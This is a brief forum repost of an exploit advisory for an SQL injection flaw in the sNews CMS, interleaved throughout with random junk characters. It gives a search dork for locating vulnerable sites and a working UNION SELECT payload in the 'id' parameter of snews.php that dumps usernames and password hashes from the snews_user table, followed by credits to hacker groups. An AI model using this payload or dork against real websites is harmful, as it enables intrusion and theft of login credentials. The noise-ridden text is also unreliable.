标题: CMS snews SQL Injection Vulnerability
, w' E) s/ v, t+ e# v作者: By onestree
) o$ [& o- H- B; E6 c% K下载地址 : http://snewscms.com/
3 J- X6 o% U9 Q; {测试平台 : ubuntu 12.10 / win 7
, M: F+ u+ e" O) c. I) @% g关键词: inurl:"tanyakan pada rumput yang bergoyang", _7 M; ^4 _- _( a2 x
$ H+ V* ^) q& g/ E1 b6 j) U8 M
q/ j3 s, F O8 E$ s*************************************************************) W& ~5 ]. R9 [& J+ k" @" T
t5 G% H/ W+ V5 e2 T) e
SQL poc:( @" I3 g3 h' C' B2 P
5 }7 j2 Y( ?' w; m/ @http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]- \4 q. T/ F8 |# D" j# a
5 v, n4 y, C+ N/ g0 j( a
示例
. t& [; d0 a4 S " L! \" t* G$ Z5 \" q7 a
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
. G3 `! `/ {' D% C " q% ~6 q( _- k; u* @( _2 R9 v1 Y
( J& v, c6 s# K4 V5 B
致谢:5 t0 ^0 p( M9 B
! v+ n% u) g0 g6 k! Q) E6 t9 h/ |$ o
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
/ P* h6 A" V3 \0 [. a& d
+ I/ ?, a% w3 G5 l1 {4 ~( d indonesiancoder - moeslimh4x0r - go-coder( T2 g8 S& r! ^1 k0 Q$ U% T6 p4 C( o
) B3 l) }# p0 }
spesial my hunny :*+ N; _ J9 l$ H7 e, x% @
|
发表于 2013-1-23 08:55:06
收藏
支持
反对